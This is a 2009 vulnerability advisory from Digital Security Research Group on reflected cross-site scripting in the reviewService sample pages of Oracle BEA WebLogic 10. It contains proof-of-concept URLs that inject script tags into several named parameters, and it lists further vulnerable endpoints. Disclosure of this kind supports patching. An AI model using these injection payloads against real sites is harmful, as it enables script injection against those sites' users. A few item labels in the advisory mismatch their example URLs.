Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21154
HistoryJan 16, 2009 - 12:00 a.m.

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-002

2009-01-1600:00:00
vulners.com
73

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-002

Application: Oracle BEA Weblogic 10
Versions Affected: Oracle BEA Weblogic 10
Vendor URL: http://oracle.com
Bugs: Multiple XSS Vulnerabilities in samples
Exploits: YES
Reported: 16.07.2008
Vendor response: 18.07.2008
Last response: 30.10.2008
Description: reviewService sample of WebLogic Server.
Date of Public Advisory: 13.01.2009
Authors: Alexandr Polyakov
Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)

Description


Multiple XSS Vulnerabilities found in Oracle BEA Weblogic Server samples version
10.2 and latest.

Details


Vulnerabilities found in reviewService sample of Weblogic Server.

  1. Linked XSS found in createArtist_service.jsp page. Vulnerable parameter "name"

Example


http://testserver.com:7001/reviewService/createArtist_service.jsp?name=<script>alert('DSECRG')</script>

  1. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "title"

Example


http://testserver.com:7001/reviewService/addBooks_session_ejb21.jsp?name=111&title=<script>alert('DSECRG')</script>

  1. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "rating"

Example


http://testserver.com:7001/reviewService/addReview_service.jsp?comment=111&rating=<script>alert('DSECRG')</script>

  1. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "rating"

Example


http://testserver.com:7001/reviewService/addReview_session.jsp?comment=111&rating=<script>alert('DSECRG')</script>

  1. Also there are a couple of XSS vulnerabilities in POST parameters in scripts:

http://testserver.com:7001/reviewService/examplesWebApp/JWS_WebService.jsp
http://testserver.com:7001/reviewService/ClientServlet
http://testserver.com:7001/reviewService/InterceptorClientServlet
http://testserver.com:7001/reviewService/createArtist_service.jsp
http://testserver.com:7001/reviewService/createArtist_session.jsp

Fix Information


This is Security-In-Depth vulnerability, because was found in
samples.(http://www.oracle.com/technology/deploy/security/cpu/cpufaq.htm)
Vulnerability issues that result in significant modification of Oracle code or
documentation in future releases,
but are not of such a critical nature that they are distributed in Critical
Patch Updates.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

Credits


Oracle give a credits for Alexander Polyakov from Digital Security Company in
Security-In-Depth program of CPU January 2009.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

About


Digital Security is leading IT security company in Russia, providing information
security consulting, audit and penetration testing services, risk analysis and
ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS
standards. Digital Security Research Group focuses on web application and
database security problems with vulnerability reports, advisories and whitepapers
posted regularly on our website.

Contact: research [at] dsec [dot] ru
http://www.dsecrg.ru
http://www.dsec.ru